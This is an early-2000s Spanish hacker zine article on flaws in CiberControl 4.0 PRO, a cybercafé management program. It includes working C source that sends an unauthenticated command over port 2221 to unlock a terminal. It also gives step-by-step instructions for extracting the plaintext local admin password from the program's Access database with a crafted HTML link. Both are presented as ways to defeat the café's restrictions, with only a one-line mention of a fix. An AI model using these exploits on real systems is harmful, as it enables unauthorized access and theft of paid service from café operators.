       ## #######   ####### #######      ####### ### ######## ######## ##      
       ## ########  ####### #######      ####### ### ######## ######## ##      
      ##      ##### ####### #######      ####### ### #### ### ########  ##     
      ##        ###                                  ###  ###           ###    
     ###  ###   ###   ###   #######  ###    ###  ### ###   ## ########  #####  
   #####  ###   ###   ###   #######  ###   ###   ### ###   ## ########  #####  
   #####  ###   ###   ###   #######        ###   ### ###   ## ########  ### #  
   # ###  ###  ####   ###   ###           ###  # ### ###   ## ###       ##  #  
   #  ##  ########   #####  ###           ###  # ### ###   ## ########  ##  #  
   #  ##  #######    #####  ###          ####### ### ###   ## ######## ##   #  
   #   ## ######     #####  ###          ####### ### ###   ## ######## ##   #  
   #   ##                                                                   #  
   #              ############################################              #  
   #             ##  DTF-Zine ISSUE #3    Mayo´02            ##             #  
   #             #   Titulo: Cibercontrol 4.0 PRO             #             #  
   ###############  Autores: Saltinpanki y Xezaw              ###############  
     #############   EMail : dtfzine@cyberspace.org           #############    
                 ##  Web   : http://www.dtfzine.cjb.net      ##               
                  ############################################               
                   ########################################## 

  
                -===CiberControl 4.0 PRO y redes en cybercafés===-
                
   ------------------------------------------------------------
  |INDICE:                                                     |
  | 1-Introducción                                             |
  | 2-Descripción del paquete CiberControl.                    |
  | 3-Seguridad en los terminales                              |
  |  3.1-Conexion entre el Control y los Terminales            |
  |  3.2-Obtencion de la clave local de Admin                  |
  | 4-Comentario sobre la Seguridad en los cibercafés          |
   ------------------------------------------------------------
  
  
  1.-Introducción
  -=-=-=-=-=-=-=-
  Hace  ya  algún  tiempo en una de  esas tardes aburridas en el cyber de  un
  amigo, me  dio por  investigar un  poco la  seguridad de  la red,  y se  me
  ocurrió  ver  como  funcionaba  el  programa  de  gestion  de  la  red,  el
  CiberControl, bien lo  primero que hice  fue ir a  la web de  Lucio Perri y
  descargar la versión de demostración de este software, cual fue mi sorpresa
  al ver  que al  instalar el  paquete del  servidor este  actuaba como si de
  verdad fuera el verdadero servidor y creaba conflictos con el otro servidor
  que existía en la red, algunos  equipos se apagaban y encendían y  yo mismo
  era capaz de desbloquear mi equipo del programa CiberPuesto, que es el  que
  está instalado en todos  los terminales de la  red. La explicación de  este
  gran fallo de seguridad estaba a la vista, no existía autentificación en la
  conexión entre el servidor y los CiberPuestos, y probablemente la  conexión
  iría sin  encriptar, en  texto plano.  Decidí instalar  un sniffer  y me di
  cuenta de que el  protocolo que usaba era  bien pobre, totalmente en  texto
  plano  y sin  ninguna garantía  de seguridad,  observé que  el puerto  que
  permanecía a la escucha en todos los clientes era el 2221. El protocolo era
  bien sencillo,  el dialogo  entre los  CiberPuestos y  el CiberControl  era
  continuo, supongo  que para  aquellas ocasiones  en que  el CiberControl se
  reiniciaba, de  esta forma  los datos  pueden actualizarse  de nuevo  en la
  máquina principal,  me refiero  concretamente a  la cuenta  del dinero y el
  tiempo. Una vez  descubierto esto y  trás comentarselo a  mi amigo Saltin,
  decidimos hacer  unas pruebas  en casa,  que la  verdad es  que las realizó
  Saltin solamente, dado que  yo solo tengo un  PC en casa y  estuve un poco
  liado esos días, Saltin no sólo  investigó más sobre este fallo, sino  que
  además descubrió otro que también resulta increible, aupa la seguridad!
  
  
  2.-Descripción del Programa
  -=-=-=-=-=-=-=-=-=-=-=-=-=-
  
  CiberControl 4.0 PRO, es un  paquete de software destinado a la  gestion de
  cibersalas  que consta  de  dos  partes, el  cliente o   ciberpuesto,  y el
  cibercontrol  desde donde   se controlarian  todos  los  equipos de  la red
  local. Este programa permite una  gestion completa de la sala  mediante una
  base  de datos que maneja distintas  tarifas, dinstintas franjas  horarias,
  usuarios registrados,  uso en   modo prepago,  o  sin   limite de    tiempo
  conociendo en todo momento el estado de cada uno de los puestos. El cliente
  o  ciberpuesto, es el  que aporta  la seguridad del  terminal en cuanto   a
  restricciones. Este consta  de varios niveles  configurables,  basicamente,
  la  seguridad reside  en  ocultar  las unidades  de disco,   restringir  el
  acceso   al   registro,   ocultar   el   menu     inicio,  desactivar   los
  downloads  de la   red,  prohibir  la ejecucion  arbitraria  de  programas,
  evitar  reiniciar el  equipo... etc. Estas   configuraciones,   se realizan
  desde el   propio  terminal,   y   son  accedidas mediante   una clave   de
  administrador.  Una  vez  dentro  del menu,  este nos  permite  fijar  todo
  tipo   de   restricciones   mediante  una   serie   de  menus.  Todas   las
  configuraciones efectuadas, seran guardadas  en un fichero del  tipo Access
  2000.



  3.-Seguridad de los terminales.
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  
  Cibercontrol  segun   revistas del  genero  es el  programa  de gestion  de
  cibersalas mas utilizado y segun varios analisis, uno de los mejores.
  No cabe duda  de que su  sistema de gestion  en cuanto a  administracion se
  refiere,  es bastante  bueno y  permite incluso  la utilizacion  de un  TPV
  (terminal punto de venta).
  Como   muchos  otros  paquetes   de  software,  no  todas  las  partes  son
  tocadas con la  misma dedicacion, y  en este caso,  la  seguridad  ha  sido
  totalmente   descuidada  en  muchos  aspectos  criticos  para  la  correcta
  administracion y estabilidad de la sala.

  3.1.-FALLO DE SEGURIDAD 1: Conexion entre el Control y los Terminales:    
  Se establece una conexion TCP/IP continua entre los terminales y el control
  siendo este el encargado de iniciar las conexiones correspondientes.
  Dado que los  terminales aceptan varias   conexiones, y  que  el  protocolo
  utilizado  carece  de   ciertos mecanismos  de  seguridad  como  el  manejo
  dinamico de claves por ejemplo,    y en  vista de  los   servicios  capaces
  de   proporcionar   el  control,  es  bastante  inseguro,  ya  una sencilla
  aplicacion puede desbloquear, apagar o reiniciar cualquier equipo de la red
  local.
  Utilizando el  mismo PROTO  de aplicacion,  una medida  eficaz contra  esta
  debilidad, seria  que  las  conexiones  se  realizaran  de  forma  inversa,
  es   decir, de  los terminales  hacia el  control, de  esta forma  estarian
  blindaos contra ordenes ajenas.


  He aqui un pequeño source para desbloquear nuestro equipo:

  -CUT-----------------------------------------------------------------------

   #include <windows.h>

   int main(int argv, char **argc)   
   {
      SOCKET sock;
      struct sockaddr_in prmts;
      char apagado[6]={'O','F','F',0x9,'3',0xd};
      char _hostname[50];
      struct hostent *host;
      short int error;
      WSAData wsaData;

      WSAStartup(MAKEWORD(1,1),&wsaData);

      gethostname( _hostname, 50);
      host = gethostbyname(_hostname);

      sock = socket(AF_INET,SOCK_STREAM,0);
      prmts.sin_family = AF_INET;
      prmts.sin_port= htons(2221);
      prmts.sin_addr.s_addr = *((unsigned *)host -> h_addr_list[0]);
      memset(&(prmts.sin_zero), '\0', 8);

      while(1)
      {
         error = connect(sock, (struct sockaddr *)&prmts, sizeof(struct sockaddr));
         if(error == 0) break;
         else prmts.sin_port= htons(2222);
      }

      send(sock, apagado,6,0);
      closesocket(sock);

      return 0;
    }

  
  -CUT----------------------------------------------------------------------


  3.2.-FALLO DE SEGURIDAD 2: Obtencion de la clave local de Admin: 
  En un  nivel de  seguridad configurado  como alto,  seria muy complicado la
  ejecucion o la simple  carga de programas en  el sistema desde  internet  o
  desde la  disketera. Es  por  tanto   necesario  conseguir  el  password de
  administracion  local  para poder  anular todas estas  restricciones,  esto
  es una tarea  muy facil ya que se incluyen distintos niveles  configurables
  y uno de  ellos por defecto  anula todas. Para    poder  ingresar en   modo
  administrador,  es  necesario  que   el terminal  este bloqueado,   esto es
  relativamente   sencillo cuando   por  ejemplo,   solicitamos  el  servicio
  prepago, una vez transcurrido el tiempo concertado, el terminal se  bloquea
  dandonos  un  margen de  espacio  para trabajar.  Probar  claves  populares
  puede  ser  una  mala  idea,  ya   que  este envia  mensajes  de  alerta al
  mostrador con el numero de puesto  y las claves utilizadas. Bien,  vamos  a
  ponernos   manos   a la  obra,    partimos de  que  las  restricciones  son
  maximas para  no llevarnos  sorpresas de  ultima hora.  Lo que  buscamos en
  principio es la base de  datos  utilizada  por el  ciberpuesto,  esta tiene
  el formato Access 2000 y  contiene la clave de  admin sin  ningun  tipo  de
  cifrado. Estos  son los pasos a
  seguir para llegar hasta ella.

     1.-Abrimos el navegador (casi con seguridad Iexplorer).

     2.-Barra de tareas >> Ver >> codigo fuente.


  De momento ya tenemos abierto el bloc de notas en caso de no poder  acceder
  a el por otros medios. Es hora de crear un fichero de formato HTML, con  el
  siguiente contenido.

  
  <html>
   <body>
   <a href="C:\WINNT\cp40.mdb"> Base de datos cibercontrol 4.0 en NT</a><br>
   <a href="C:\windows\cp40.mdb"> Base de datos cibercontrol 4.0 en 98/Me</a>
   </body>
  </html>

 
   Nota: Parto de que la version utilizada es la 4.0


  Una vez creado  el fichero lo  guardamos en cualquier  hueco del HD  al que
  tengamos un acceso minimo y lo ejecutamos.

  3.-Una  vez abierto   el fichero,   picamos  el link  que  corresponda   al
  SO  de la  maquina,   inmediatamente    el  sistema  nos  dara la    opcion
  de  guardar o abrir, lo guardamos  al igual que antes en cualquier    hueco
  manejable y lo  renombramos a  extension .DOC, una vez hecho  esto, abrimos
  el fichero.


    4.- Una vez abierto tratamos de localizar en el codigo la ultima marca:

                                        ----------
                                         C:\cp2.2
                                        ----------


 una   vez   localizada,   avanzando   en   el  codigo,   encontraremos    la
 direccion del  grafico que  utilizara cibercontrol  de salvapantallas cuando
 este  se  encuentre  en  modo de  bloqueado,  una  vez  localizado esto  nos
 toparemos con la 

                                          ------
                                          # ÿþ #
                                          ------
 Seguida a  esta  se  encontrara la   clave de  admin  finalizando con  algun
 caracter   que  descartaremos  enseguida  por  su   caracter  repetitivo, un
 ejemplo de esto podria ser

                             
                              -------------------------------
                              # \Plumas.bmpÿþsesamo0¬0¬0¬0¬ #
                              -------------------------------

    La clave en este caso seria 'sesamo', y el '0' final, seria descartado.
 

 4.-Seguridad actual en cybercafés:
 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
 Ultimamente este  tipo de  salas están  proliferando mucho.  La pregunta es,
 ¿están estas salas realmente preparadas contra su manipulación de  software,
 robo de datos,  realización de actos  ilegales desde ellas..?,  la respuesta
 está  a la  vista, la  verdad es  que no,  este tipo  de  salas  tienen  una
 seguridad mínima facilmente quebrantable, unos la usan para no pagar por  su
 acceso a internet, otros la usan  para cometer actos ilegales desde ellas  y
 otros la usan  para simplemente robar  los datos de  los clientes. La  mayor
 parte  de estas   salas cuentan  con  programas  de gestión   de las  mismas
 que   como acabamos    de ver    ahora tienen  fallos   de   seguridad   muy
 graves,  otras incluso no cuentan con ningun tipo  de soft y simplemente con
 esperar  a  que se  valla el  pesado  de  turno puedes  hacer  lo  que se te
 antoje,  el personal  contratado en  ellas  no  suele estar   dotado de  los
 conocimientos mínimos de administración  de una  red, los  virus  proliferan
 por ella,  los recursos compartidos  se  pueden encontrar  hasta  en el   pc
 servidor  o   incluso  te  encuentras  con routers  adsl  con passwords  por
 defecto, algunas usan lectores de tarjetas  para dar acceso que yo mismo  he
 comprobado tienen bugs  bastante serios, permitiendo por ejemplo  dar acceso
 a dos  ordenadores a la vez  con una misma tarjeta... por lo tanto no es  de
 extrañar que mucha gente los   use de plataforma para sus  actos delictivos,
 la gente dice,,, para que me voy  a pringar yo con mi número de teléfono  de
 por medio?, me voy a un cyber y  hago lo  que se  me antoje.  La verdad   es
 que  el problema  es importante  y me  pregunto yo qué pasará el día en  que
 se arme  alguna importante  y la  justicia tenga  que ir  a pedir cuentas al
 administrador de  un cyber.  La verdad  es  que  creo que   estamos ante  un
 problema/chollo  importante, y  que los niños que juegan  al  counter  deben
 de dar bastante dinerito porque sino no entiendo este boom.
 


       

                                     
 
 
    
   





  


  

   

  
   
  
   

   
